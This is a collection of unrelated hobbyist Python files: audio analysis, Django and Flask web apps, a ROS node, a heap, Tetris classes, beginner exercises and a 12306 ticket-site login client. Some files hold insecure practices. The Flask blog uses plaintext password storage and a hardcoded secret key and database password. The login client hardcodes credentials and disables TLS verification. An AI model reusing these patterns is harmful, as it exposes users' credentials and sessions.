no_frames = int(math.ceil(len(data) / (float(hop_size)))) # Determining the number of frames
zero_array = np.zeros(window_size) # Appending appropriate number of zeros
data = np.concatenate((data, zero_array))
x_values = np.arange(0, len(data), 1) / float(fs)
gamma = []
sums = 0
auto = []
for i in range(no_frames):
frame = data[i * hop_size:i * hop_size + window_size] * window_type
# frame_1 = frame.tolist()
# frame_1.reverse()
# for h in range(0,len(frame)-1):
# for t in range(0,len(frame)-h):
# sums = sums + frame[t+h]*frame[t]
# gamma.append(sums/len(frame))
# sums = 0
auto.append(max(np.correlate(frame,frame)))
gamma[:] = []
max_st_energy = max(auto) # Maximum value of Short term energy curve
for i in range(no_frames):
auto[i] = auto[i] / max_st_energy # Normalizing the curve
seg = int(no_frames/200)
rem = no_frames%200
print seg, rem, no_frames
print auto
for i in range(0,seg-1):
print i*200, (i+1)*200
maxi = max(auto[i*200:(i+1)*200])
for j in range(i*200,(i+1)*200):
auto[j] = auto[j]/maxi
print auto
# for i in range(no_frames):
st_energy = []
for i in range(no_frames):
frame = data[i * hop_size:i * hop_size + window_size] * window_type
st_energy.append(sum(frame ** 2))
# gamma = []
# sum = 0
# for h in range(0,len(data)-1):
# for t in range(0, len(data) - h):
# sum = sum + data[t+h]*data[t]
# gamma.append(sum)
# # print len(gamma)
# sum = 0
plt.subplot(311)
plt.plot(data)
plt.subplot(312)
plt.plot(auto)
plt.subplot(313)
plt.plot(st_energy)
plt.show()
|
import os
env = Environment(ENV = os.environ)
env.Program("trafficSim",Glob("*.cc") + Glob("*/*.cc"), CCFLAGS="-g -O0 -std=c++11")
|
from django.shortcuts import render
from django.http import HttpResponse
def home(request):
#return HttpResponse("Hello world");
return render(request, 'home.html', {'name':'someone'});
def add(request):
no1 = int(request.POST['no1'])
no2 = int(request.POST['no2'])
result = no1 + no2
return render(request, 'result.html', {'name':'someone', 'result':result});
|
import autodisc as ad
import numpy as np
import os
import pickle
class Classifier:
@staticmethod
def default_config():
return ad.Config()
def __init__(self, config=None, **kwargs):
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
def calc(self, observations, statistics):
pass
class Representation:
@staticmethod
def default_config():
return ad.Config()
def __init__(self, config=None, **kwargs):
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
def calc(self, observations, statistics):
pass
def calc_distance(self, representation1, representation2):
'''
Standard Euclidean distance between representation vectors.
'''
if len(representation1) == 0 or len(representation2) == 0:
return np.array([])
diff = np.array(representation1) - np.array(representation2)
if np.ndim(diff) == 1:
dist = np.linalg.norm(diff)
else:
dist = np.linalg.norm(diff, axis=1)
return dist
class System:
@staticmethod
def default_system_parameters():
return ad.Config()
@staticmethod
def default_config():
return ad.Config()
def default_statistics(self):
'''
The default statistics associated with a system, that are loaded if the user does not specify any statistics.
:return: List with Statistics.
'''
return []
def __init__(self, statistics=None, system_parameters=None, config=None, **kwargs):
'''
Initialize a system.
:param params_sys: System parameters in form of a dictionary.
:param statistics: List of statistics.
'''
self.system_parameters = ad.config.set_default_config(system_parameters, self.__class__.default_system_parameters())
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
self.run_parameters = None
if statistics is None:
self.statistics = self.default_statistics()
elif not isinstance(statistics, list):
# statistics should be a list
self.statistics = [statistics]
else:
self.statistics = statistics
def run(self, run_parameters=None, stop_conditions=100, observation_filter=None):
'''
Runs the system for the given parameters.
:param run_parameters
:param stop_conditions List with conditions by which the run stops. If any of the conditions is fullfilled, the run stops.
Possible conditions: int - maximum number of steps
function handle - the function is called and a bool is expected. Function parameters: system, step, state, statistics
'''
self.run_parameters = run_parameters
if not isinstance(stop_conditions, list):
stop_conditions = [stop_conditions]
max_number_of_steps = float('inf')
stop_condition_functions = []
for stop_condition in stop_conditions:
if isinstance(stop_condition, int):
max_number_of_steps = min(stop_condition, max_number_of_steps)
else:
stop_condition_functions.append(stop_condition)
states = []
step = 0
# intialize system
state = self.init_run(run_parameters)
for stat in self.statistics:
stat.calc_after_init(self, state)
states.append(state)
# simulate system until a stop_condition is fullfilled
while step < max_number_of_steps-1 and np.all([not f(self, step, state, self.statistics) for f in stop_condition_functions]):
step += 1
state = self.step(step)
states.append(state)
for stat in self.statistics:
stat.calc_after_step(self, state, step)
# end system
self.stop()
for stat in self.statistics:
stat.calc_after_stop(self)
# calculate the final statistics over all observations
for stat in self.statistics:
stat.calc_after_run(self, states)
observations = ad.helper.data.AttrDict()
observations.timepoints = list(range(step+1))
observations.states = states
# collect statistics data
statistics_data = dict()
for stat in self.statistics:
statistics_data = {**stat.data, **statistics_data}
statistics_data = ad.helper.data.AttrDict(statistics_data)
return observations, statistics_data
def init_run(self, run_parameters):
pass
def step(self, step_idx):
pass
def stop(self):
pass
class SystemStatistic:
@staticmethod
def default_config():
return ad.Config()
def __init__(self, system=None, config=None, **kwargs):
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
self.data = ad.helper.data.AttrDict()
def reset(self):
# set all statistics to zero
for key in self.data.keys():
self.data[key] = []
def calc_after_init(self, system, obs):
pass
def calc_after_step(self, system, obs, step):
pass
def calc_after_stop(self, system):
pass
def calc_after_run(self, system, all_obs):
pass
class Explorer:
'''
Base class for exploration experiments.
Allows to save and load exploration results
'''
@staticmethod
def default_config():
default_config = ad.Config()
default_config.id = None
default_config.descr = None
default_config.seed = None
return default_config
def __init__(self, system, datahandler=None, config=None, **kwargs):
self.system = system
# if experiment_stats is None:
# self.experiment_stats = []
# if not isinstance(experiment_stats, list):
# self.experiment_stats = [experiment_stats]
# else:
# self.experiment_stats = experiment_stats
if datahandler is None:
self.data = ad.ExplorationDataHandler.create(directory='./results')
else:
self.data = datahandler
# set config
self.config = ad.config.set_default_config(kwargs, config, self.__class__.default_config())
# save some of the initial parameters in the data as documentation and to allow replication
exploration_data = ad.DataEntry()
exploration_data.id = self.config.id
exploration_data.descr = self.config.descr
exploration_data.seed = self.config.seed
exploration_data.system_parameters = self.system.system_parameters
exploration_data.system_name = self.system.__class__.__name__
exploration_data.software_version = ad.__version__
self.data.add_exploration_data(exploration_data)
if self.config.seed is not None:
self.random = np.random.RandomState()
else:
self.random = np.random.RandomState(self.config.seed)
def run(self):
pass
def save(self):
# save experiment data
self.data.save()
if 'directory' in self.data.config:
self.save_explorer_obj(directory=self.data.config.directory)
else:
raise NotImplementedError('Saving the explorer object for non file based databases is not implemented yet!')
def save_explorer_obj(self, directory=None):
'''
Saves the explorer via pickle to the given directory.
Note, that this does not save the data and the configuration.
Use explorer.save() to save the data and the explorer or explorer.data.save() to only save the data.
'''
if directory is None:
directory = self.data.config.directory
if not os.path.exists(directory):
os.makedirs(directory)
filepath = os.path.join(directory, 'explorer.pickle')
file = open(filepath, 'wb')
# do not pickle the data, but save it in extra files
tmp_data = self.data
self.data = None
# do not pickle configuration, because it might contain lambda functions or other element that can not be pickled
# we assume that the configuration is anyway saved for each experiment and that the useer can load it
tmp_config = self.config
self.config = None
# store configuration of the datahandler, so that it can be retrieved
self.datahandler_config = tmp_data.config
# pickle exploration object
pickle.dump(self, file)
# attach results and config again to the exploration object
self.data = tmp_data
del self.datahandler_config
self.config = tmp_config
def calc_run_statistics(self, statistics, is_rerun=False, verbose=False):
'''Calculates the given statistics for all run data elements.'''
if not isinstance(statistics, list):
statistics = [statistics]
if is_rerun:
#TODO: implement rerun
raise NotImplementedError('Rerunning the system for the calculation of extra statistics is not implemented yet!')
system = self.system
if verbose:
counter = 0
ad.gui.print_progress_bar(counter, len(self.data), 'Runs: ')
for run_data in self.data:
if run_data.observations is None:
[obs,_] = system.run(run_parameters=run_data.run_parameters,
stop_conditions=self.config.stop_conditions)
all_obs = obs.states
else:
all_obs = run_data.observations.states
system.run_parameters = {**run_data.run_parameters, **self.system.system_parameters}
for stat in statistics:
stat.reset()
stat.calc_after_run(system, all_obs)
# collect statistics data
statistics_data = dict()
for stat in statistics:
statistics_data = {**stat.data, **statistics_data}
statistics_data = ad.helper.data.AttrDict(statistics_data)
new_stats = {**statistics_data, **run_data.statistics}
self.data.add_run_data(run_data.id, statistics=new_stats)
if verbose:
counter += 1
ad.gui.print_progress_bar(counter, len(self.data), 'Runs: ')
if counter == len(self.data):
print('')
@staticmethod
def load_explorer(directory='./results', load_data=True, run_ids=None, load_observations=None, verbose=False):
explorer_filepath = os.path.join(directory, 'explorer.pickle')
with open(explorer_filepath, "rb") as explorer_file:
explorer = pickle.load(explorer_file)
if load_data:
explorer.data = ad.ExplorationDataHandler.create(config=explorer.datahandler_config, directory=directory)
explorer.data.load(run_ids=run_ids, load_observations=load_observations, verbose=verbose)
del explorer.datahandler_config
return explorer
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import re
import numpy as np
import os
import subprocess
import sys
def compare(repeat, group, step):
techniques = filter(lambda x : x not in ["utils"], [i.split(".")[0] for i in os.listdir("./techniques")])
tasks = {"cpu_bound" : 100000, "io_bound" : "https://gitlabe1.ext.net.nokia.com"}
x = [step * (i + 1) for i in xrange(group)]
for task_type, task in tasks.iteritems():
y = {}
for t in techniques:
y[t] = np.zeros((repeat, group))
for r in xrange(repeat):
for g in xrange(1, group + 1):
for t in techniques:
print "task_type: %s; repeat: %d; group: %d; technique:%s" % (task_type, r, g, t)
res = subprocess.check_output("python ./techniques/%s.py %s %s" % (t, task, g), shell=True)
y[t][r][g-1] = float(res.strip())
for t in techniques:
np.savetxt("./result/%s_%s_data.txt" % (task_type, t), y[t])
y[t] = y[t].sum(0)/repeat
d = 2000
xlabel = 'num of tasks'
ylabel = 'average time in seconds'
plt.figure(1)
styles= ["g^-", "ro-", "b+-", "y>-", "k<-"]
for t in techniques:
plt.plot(x, y[t], styles.pop(0), label="%s technique"%t)
plt.legend(loc='best')
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.savefig('./result/compare_%s.png' % task_type, dpi=d)
plt.close()
if __name__ == "__main__":
repeat = int(sys.argv[1]) if len(sys.argv) > 1 else 10
group = int(sys.argv[2]) if len(sys.argv) > 2 else 10
step = int(sys.argv[3]) if len(sys.argv) > 3 else 1000
compare(repeat, group, step)
|
#!/usr/bin/env python
import rospy
from std_msgs.msg import String, UInt32
from gps_agent_pkg.msg import LaikaCommand, LaikaState, LaikaStateArray, LaikaAction
import numpy as np
def state_callback(msg):
rospy.loginfo(msg)
def init_node():
# Initialize node
rospy.init_node('laika_control', anonymous=True)
rate = rospy.Rate(10) # 10hz
# Initialize publishers and subscribers
pub_cmd = rospy.Publisher('cmd', LaikaCommand, queue_size=1)
pub_act = rospy.Publisher('action', LaikaAction, queue_size=1)
sub = rospy.Subscriber('state', LaikaStateArray, state_callback)
return pub_cmd, pub_act, sub
if __name__ == '__main__':
pub_cmd, pub_act, sub = init_node()
counter = 0
cmd_msg = LaikaCommand()
act_msg = LaikaAction()
# state_msg = UInt32()
rate = rospy.Rate(10) # 10hz
while not rospy.is_shutdown():
cmd_msg.header.seq = counter
cmd_msg.header.stamp = rospy.Time.now()
act_msg.header.seq = counter
act_msg.header.stamp = rospy.Time.now()
act_msg.actions = np.random.uniform(5,15,44)
if counter % 100 == 0:
cmd_msg.cmd = 'reset'
else:
cmd_msg.cmd = 'step'
pub_cmd.publish(cmd_msg)
rospy.loginfo(cmd_msg)
pub_act.publish(act_msg)
rospy.loginfo(act_msg)
counter += 1
rate.sleep()
|
from rest_framework import serializers
from movies_app.model.users import User
from movies_app import models
class LoginSerializer(serializers.ModelSerializer):
class Meta:
model = models.User
fields = "__all__"
|
import webapp2
from webapp2_extras import jinja2
from google.appengine.api import users
from google.appengine.ext import ndb
from model.libroCientifico import libroCientifico
class EliminarlibroCientificoHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
try:
id_libroCientifico = self.request.GET["id_libroCientifico"]
except:
id_libroCientifico = "ERROR"
libroCientifico = ndb.Key(urlsafe=id_libroCientifico).get()
sust = {
"libroCientifico" : libroCientifico
}
jinja = jinja2.get_jinja2(app=self.app)
self.response.write(jinja.render_template("librosCientificos/eliminarLibroCientifico.html", **sust))
else:
self.redirect("/")
return
def post(self):
user = users.get_current_user()
if user:
id_libroCientifico = self.request.get("edIdLibroCientifico", "ERROR")
libroCientifico = ndb.Key(urlsafe=id_libroCientifico).get()
url = "/listarLibrosCientificos"
mensaje = "El libro: "+libroCientifico.titulo+" ha sido eliminado con exito"
libroCientifico.key.delete()
sust = {
"mensaje": mensaje,
"url": url
}
jinja = jinja2.get_jinja2(app=self.app)
self.response.write(jinja.render_template("mensajeConfirmacion.html", **sust))
else:
self.redirect("/")
return
app = webapp2.WSGIApplication([
('/eliminarLibroCientifico', EliminarlibroCientificoHandler),
], debug=True)
|
from io import *
from urllib import *
'''
This is a test of opening and reading from files.
'''
f = open('TestFile.txt', 'r+')
for l in f:
print(l)
f.write('I just added this line.')
for l in f:
print(l)
urlopen('https://www.google.com')
|
from flask import Flask, request, redirect, render_template, session, flash
from flask_sqlalchemy import SQLAlchemy
import cgi
import os
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://blogz:chedder@localhost:8889/blogz'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
app.secret_key = "12345"
class Blog(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(120))
body = db.Column(db.String(120))
owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __init__(self, title, body, owner):
self.title = title
self.body = body
self.owner = owner
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(120), unique=True)
password = db.Column(db.String(120))
blogs = db.relationship('Blog', backref='owner')
def __init__(self, name, password):
self.name = name
self.password = password
@app.before_request
def require_login():
allowed_routes = ['index','home', 'UserBlog', 'allposts', 'signup', 'login','blogpost']
if request.endpoint not in allowed_routes and 'name' not in session:
return redirect('/login')
@app.route('/UserBlog', methods=['GET'])
def blog():
name = request.args['name']
blogset = Blog.query.filter_by(owner_id=name)
return render_template('blog.html', blogset=blogset )
@app.route('/allposts', methods=['GET'])
def allposts():
blogset = reversed(Blog.query.all())
return render_template('blog.html', blogset=blogset )
@app.route('/signup', methods=['GET', 'POST'])
def signup():
if request.method == 'POST':
name = request.form['name']
password = request.form['password']
verify = request.form['verify']
error = False
if name.strip() == '':
flash("cannot be empty",'error')
error = True
if len(name)>=120 or len(name)<=3:
flash("That's not a valid user name",'error')
error = True
if len(password)<=3 or len(password)>=120:
flash("That's not a valid password",'error')
error = True
if password != verify:
flash("Passwords don't match",'error')
error = True
if error is False:
existing_user = User.query.filter_by(name=name).first()
if not existing_user:
new_user = User(name, password)
db.session.add(new_user)
db.session.commit()
session['name'] = name
return redirect('/newpost')
else:
flash('must be new user', 'error')
return render_template('signup.html')
return render_template('signup.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
name = request.form['name']
password = request.form['password']
user = User.query.filter_by(name=name).first()
if user and user.password == password:
session['name'] = name
flash('Logged In')
return redirect('/home')
else:
flash('User password is incorrect or user does not exist', 'error')
return render_template('login.html')
@app.route('/')
def home():
return redirect('/home')
@app.route('/home', methods=['GET','POST'])
def index():
user_list = (reversed(User.query.all()))
return render_template('index.html', user_list=user_list )
@app.route('/logout')
def logout():
del session['name']
return redirect('/home')
@app.route('/newpost', methods=['POST', 'GET'])
def newblog():
owner = User.query.filter_by(name=session['name']).first()
title = ''
body = ''
title_error = ''
body_error = ''
error = False
if request.method == 'POST':
title = request.form['title']
body = request.form['body']
if title.strip() == '':
title_error = "cannot be empty"
error = True
if body.strip() == '':
body_error = "cannot be empty"
error = True
if error is False:
blog = Blog(title, body, owner)
db.session.add(blog)
db.session.commit()
blog_id = str(blog.id)
return redirect('/blogpost?id='+blog_id)
return render_template('newpost.html', title=title,
body=body, title_error=title_error, body_error=body_error)
@app.route('/blogpost', methods=['GET'])
def blogpost():
id = request.args['id']
blog = Blog.query.filter_by(id=id).first()
blog = db.session.query(Blog).filter(Blog.id == id).first()
return render_template('blogpost.html', blog=blog)
if __name__ == '__main__':
app.run()
|
# -*- coding: utf-8 -*-
"""
Genera archivos de entrada para el programa de elementos finitos
FEM_iso para la prueba brasilera, usando 2 simetrías en el modelo.
@author: Nicolas Guarin-Zapata
@date: Mayo 18, 2017
"""
from __future__ import division, print_function
import numpy as np
import meshio
import solidspy.preprocesor as msh
points, cells, point_data, cell_data, field_data = \
meshio.read("Prueba_brasilera.msh")
nodes_array = msh.node_writer(points, point_data)
nf , els_array = msh.ele_writer(cells, cell_data, "triangle", 1000 , 3 , 0 , 0)
nodes_array = msh.boundary_conditions(cells, cell_data, 100, nodes_array, -1, 0)
nodes_array = msh.boundary_conditions(cells, cell_data, 200, nodes_array, 0, -1)
np.savetxt("eles.txt" , els_array , fmt="%d")
np.savetxt("nodes.txt", nodes_array , fmt=("%d", "%.4f", "%.4f", "%d", "%d"))
|
#!/usr/bin/env python3
# Min priority queue implementation using a binary heap
class PQueue():
# The number of elements currently inside the heap
size = 0
# A dynamic list to track the elements inside the heap
heap = []
def __init__(self, elements = None):
if elements != None:
self.heapify(elements)
def heapify(self, elements):
self.size = len(elements)
self.heap = list(elements)
# Heapify process, O(n)
for i in range(max(0, (self.size//2)-1), -1, -1):
self._sink(i)
def clear(self):
self.heap = []
self.size = 0
def is_empty(self):
return self.size == 0
# Return the size of the heap
def __len__(self):
return self.size
# Returns the value of the element with the lowest
# priority in this priority queue. If the priority
# queue is empty null is returned
def peek(self):
if self.is_empty(): return None
return self.heap[0]
# Removes the root of the heap, O(log(n))
def poll(self):
return self._remove_at(0)
# Test if an element is in heap, O(n)
def __contains__(self, elem):
# Linear scan to check containment, O(n)
for i in range(self.size):
if self.heap[i] == elem:
return True
return False
# Adds an element to the priority queue, the
# element must not be null, O(log(n))
def add(self, elem):
if elem == None: raise ValueError("Element cannot be None")
self.heap.append(elem)
self._swim(self.size)
self.size += 1
# Removes a particular element in the heap, O(n)
def remove(self, elem):
if elem == None: return False
# Linear removal via search, O(n)
for i in range(self.size):
if elem == self.heap[i]:
self._remove_at(i)
return True
return False
# Tests if the value of node i <= node j
# This method assumes i & j are valid indices, O(1)
def _less(self, i, j):
return self.heap[i] <= self.heap[j]
# Swap two nodes. Assumes i & j are valid, O(1)
def _swap(self, i, j):
self.heap[i], self.heap[j] = self.heap[j], self.heap[i]
# Perform bottom up node swim, O(log(n))
def _swim(self, k):
# Grab the index of the next parent node WRT to k
parent = (k-1) // 2
# Keep swimming while we have not reached the
# root and while we're less than our parent.
while k > 0 and self._less(k, parent):
self._swap(parent, k)
k = parent
# Grab the index of the next parent node WRT to k
parent = (k-1) // 2
# Perform top down node sink, O(log(n))
def _sink(self, k):
while True:
left = 2*k + 1 # left node
right = 2*k + 2 # right node
smallest = left # Assume left is the smallest node of the two children
# Find which is smaller left or right node
# If right is smaller set smallest to be right
if right < self.size and self._less(right, left):
smallest = right
# Stop if we're outside the bounds of the tree
# or stop early if we cannot sink k anymore
if left >= self.size or self._less(k, smallest): break
# Move down the tree following the smallest node
self._swap(smallest, k)
k = smallest
# Removes a node at particular index, O(log(n))
def _remove_at(self, i):
if self.is_empty(): return None
self.size -= 1
removed_data = self.heap[i]
self._swap(i, self.size)
# Obliterate the value
del self.heap[self.size]
# Removed last element
if i == self.size: return removed_data
elem = self.heap[i]
# Try sinking element, and if sinking did not work try swimming
self._sink(i)
if self.heap[i] == elem: self._swim(i)
return removed_data
|
import sdl2.ext
import tetris.configuration.Colors
from tetris.configuration.Configuration import *
class GameBoard(object):
def __init__(self):
self.board = [[None for x in range(num_columns())] for x in range(num_rows()+2)]
class GameState(object):
def __init__(self):
self.game_over = False
class MovementInput(object):
def __init__(self):
self.rotate_cw = False
self.rotate_ccw = False
self.move_left = False
self.move_right = False
self.soft_drop = False
self.hard_drop = False
def reset(self):
self.rotate_cw = False
self.rotate_ccw = False
self.soft_drop = False
self.hard_drop = False
self.move_left = False
self.move_right = False
class BlockCollection(object):
def __init__(self, blocks):
self.blocks = blocks
class BoardCoordinates(object):
def __init__(self, pos, offset):
self.pos = (pos[0]+offset[0], pos[1]+offset[1])
self.offset = offset
def get_ccw_offset(self):
return self.offset[1], -self.offset[0]
def get_cw_offset(self):
return -self.offset[1], self.offset[0]
def get_normalized_coordinates(self):
return self.pos[0]-self.offset[0], self.pos[1]-self.offset[1]
def get_ccw_coordinates(self):
center = self.get_normalized_coordinates()
offset = self.get_ccw_offset()
return center[0]+offset[0], center[1]+offset[1]
def get_cw_coordinates(self):
center = self.get_normalized_coordinates()
offset = self.get_cw_offset()
return center[0]+offset[0], center[1]+offset[1]
class MovementState(object):
def __init__(self):
self.locked = False
class AudioState(object):
def __init__(self):
self.play_soft_drop = False
self.play_line_clear = False
def reset(self):
self.play_soft_drop = False
self.play_line_clear = False
class EndGameCondition(sdl2.ext.Entity):
def __init__(self, world, game_board):
self.gamestate = GameState()
self.gameboard = game_board
class ControllablePiece(sdl2.ext.Entity):
def __init__(self, world, game_board, blocks):
self.blocks = blocks
self.movementinput = MovementInput()
self.gameboard = game_board
self.blockcollection = BlockCollection(blocks)
self.movementstate = MovementState()
self.audiostate = AudioState()
def clear(self):
self.delete()
for block in self.blockcollection.blocks:
block.delete()
class Block(sdl2.ext.Entity):
def __init__(self, world, color, game_board, offset):
center = (len(game_board.board[0])/2, 0)
block_width = window_width()/num_columns()
block_height = window_height()/(num_rows())
factory = sdl2.ext.SpriteFactory(sdl2.ext.SOFTWARE)
self.boardcoordinates = BoardCoordinates(center, offset)
posx = self.boardcoordinates.pos[0] * block_width
posy = self.boardcoordinates.pos[1]-2 * block_height
self.sprite = factory.from_color(tetris.configuration.Colors.WHITE, size=(block_width, block_height))
self.sprite.position = (posx, posy)
sdl2.ext.fill(self.sprite, color, (1, 1, block_width-2, block_height-2))
class IPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-2, 0))
blocks[1] = Block(world, color, game_board, (-1, 0))
blocks[2] = Block(world, color, game_board, (0, 0))
blocks[3] = Block(world, color, game_board, (1, 0))
super(IPiece, self).__init__(world, game_board, blocks)
class JPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (1, 0))
blocks[3] = Block(world, color, game_board, (1, 1))
super(JPiece, self).__init__(world, game_board, blocks)
class LPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (1, 0))
blocks[3] = Block(world, color, game_board, (-1, 1))
super(LPiece, self).__init__(world, game_board, blocks)
class OPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (-1, 1))
blocks[3] = Block(world, color, game_board, (0, 1))
super(OPiece, self).__init__(world, game_board, blocks)
class SPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 1))
blocks[1] = Block(world, color, game_board, (0, 1))
blocks[2] = Block(world, color, game_board, (0, 0))
blocks[3] = Block(world, color, game_board, (1, 0))
super(SPiece, self).__init__(world, game_board, blocks)
class TPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (1, 0))
blocks[3] = Block(world, color, game_board, (0, 1))
super(TPiece, self).__init__(world, game_board, blocks)
class ZPiece(ControllablePiece):
def __init__(self, world, game_board, color):
blocks = [None for x in range(4)]
blocks[0] = Block(world, color, game_board, (-1, 0))
blocks[1] = Block(world, color, game_board, (0, 0))
blocks[2] = Block(world, color, game_board, (0, 1))
blocks[3] = Block(world, color, game_board, (+1, 1))
super(ZPiece, self).__init__(world, game_board, blocks)
|
# Exercício 5.24 - Livro
qtd = int(input('Quantos números primos você deseja ver? '))
num = 1
cont = 1
print(f'Os {qtd} primeiros números primos são ', end='')
while cont <= qtd:
inicio = 1
fim = num
div = 0
while inicio <= fim:
if num % inicio == 0:
div += 1
inicio += 1
if div == 2:
print(f'{num}', end=', ' if cont <= (qtd - 1) else '.')
cont += 1
num += 1
|
from django.shortcuts import render
from visitsapi.forms import VisitsForm
from django.http import JsonResponse
from rest_framework import status
from django.core import serializers
import json
from django.views.decorators.csrf import csrf_exempt
from .models import Visit
# Create your views here.
@csrf_exempt
def visits(request):
if request.method == "POST":
visit_form = VisitsForm(request.POST)
is_valid = visit_form.is_valid()
if not is_valid:
response = JsonResponse({"errors": visit_form.errors})
response.status_code = status.HTTP_400_BAD_REQUEST
else:
visit = visit_form.save()
data = json.loads(serializers.serialize("json", [visit, ]))[0] # Model.objects?
response_data = {'id': data['pk']}
response_data.update(data['fields'])
response = JsonResponse(response_data)
response.status_code = status.HTTP_201_CREATED
return response
elif request.method == "GET":
data = json.loads(serializers.serialize("json", Visit.objects.all())) # Model.objects?
response = JsonResponse(data, safe=False)
response.status_code = status.HTTP_200_OK
return response
|
# -*- coding:utf-8 -*-
# Author: Jorden Hai
Name = input("Name:")
Age = int(input("Age:"))
Job = input("Job:")
Salary = int(input("Salary:"))
#raw_input_2.x input_3.x
#input_2.x 输入什么格式是什么格式 input() 多余的语法
print('name','=',type(Name))
#格式化输出 方案一
info='''
---------info of Stuff ----------
Name:%s
Age:%d
Job:%s
Salary:%d
'''%(Name,Age,Job,Salary)
#格式化输出 方案二
info2 = '''
---------info of Stuff ----------
Name:{_Name}
Age:{_Age}
Job:{_Job}
Salary:{_Salary}
'''.format(_Name = Name,
_Age = Age,
_Job = Job,
_Salary = Salary)
#格式化输出 方案三
info3 = '''
---------info of Stuff ----------
Name:{0}
Age:{1}
Job:{2}
Salary:{3}
'''.format(Name,Age,Job,Salary)
print(info,info2,info3)
|
# counts all the vowels in a sentence
print("Enter a sentence: ")
sentence = input()
voweldictionary = {"a": 0, "e": 0, "i": 0, "o": 0, "u": 0}
for i in range(len(sentence)):
if sentence[i] in voweldictionary.keys():
voweldictionary[sentence[i]] += 1
print(voweldictionary)
|
# -*- coding: utf-8 -*-
"""
by rohan
ver 0.0.1
"""
import time
#import secrets
import io
import requests
from PIL import Image
#Disable security SSL warning
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
disable_warnings(InsecureRequestWarning)
class Dingdong12306:
def __init__(self):
self.session = requests.session()
self.header = {
"Host":"kyfw.12306.cn",
"Referer":"https://kyfw.12306.cn/otn/login/init",
"Connection":"keep-alive",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
}
# 1.Get authurize code
#Remote Address:113.107.58.182:443
def captcha(self):
certUrl = "https://kyfw.12306.cn/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand"
rc = self.session.get(url=certUrl,headers=self.header,verify=False)
if rc.status_code != 200:
print(rc.status_code,"connect captcha server failed.")
print(rc.text)
self.captcha()
else:
#print(rc.content)
return rc.content
"""
#show image for certification code
from PyQt5.QtWidgets import QWidget,QApplication,QLabel,QLineEdit
from PyQt5.QtGui import QPixmap
import sys
app = QApplication(sys.argv)
wnd = QWidget()
wnd.resize(300,300)
wnd.setWindowTitle("验证码")
img = QPixmap()
img.loadFromData(rc.content)
limg = QLabel(wnd)
limg.setPixmap(img)
ltxt = QLabel("Text here",wnd)
ltxt.move(90,100)
edit = QLineEdit(wnd)
edit.move(0,200)
print(edit.text())
wnd.show()
app.exec_()
"""
#2. Post Certification code
def captchacheck(self,codenum):
postUrl = "https://kyfw.12306.cn/passport/captcha/captcha-check"
#post image position(x,y)
certpos = ["53,37","113,37","193,36","237,37","33,113","121,111","205,112","247,111"]
certnums = []
# Get input
#codenum = input("请输入识别的验证码图片编号,0-7: ")
# translate input num to image coordinates
for num in codenum:
certnums.append(certpos[int(num)])
postData = {"answer":certnums,"login_site":"E","rand":"sjrand"}
rp = self.session.post(url=postUrl,data=postData,headers=self.header,verify=False)
return rp.json()["result_message"]
##############3. uamtk##################
def uamtk(self):
uamtk = "https://kyfw.12306.cn/passport/web/auth/uamtk"
udata = {"appid":"otn"}
ru = self.session.post(uamtk,headers=self.header,data=udata,verify=False)
print(ru.json())#["result_message"])
return ru.json()
#4. Post account info
#######3. Login function################################################
def loginto(self):
#1) login to init page
loginit = "https://kyfw.12306.cn/otn/login/init"
self.session.get(loginit,headers=self.header,verify=False)
#) check logined
loginstatus = self.uamtk()
print(loginstatus)
if loginstatus["result_code"] == 1:
#2) certification code check
self.captcha()
usr = "rohanr"#input("用户名: ")
psw = "alin520526"#input("密码: ")
loginurl ="https://kyfw.12306.cn/passport/web/login"
logindata={"username":usr,"password":psw,"appid":"otn"}
rl = self.session.post(url=loginurl,headers=self.header,data=logindata,verify=False)
#{"result_message":"登录成功","result_code":0,"uamtk":"FX4aNxll3XLCHe_XVUuIne5aVfPdmBIZxhr1r0"}
rcontype = rl.headers.get("Content-Type")
if rcontype == "application/json;charset=UTF-8":
print(rl.json()["result_message"])
return rl.json()
else:
print(rcontype,"登陆失败,重新登陆")
if rl.encoding != "utf-8":
rl.encoding = "utf-8"
print(rl.text)
rl.cookies.clear()
self.loginto()
#######4. uamtkclient#############################################################
def uamtkclient(self,uamtk):
uclient = "https://kyfw.12306.cn/otn/uamauthclient"
ucdata = {"tk":uamtk}
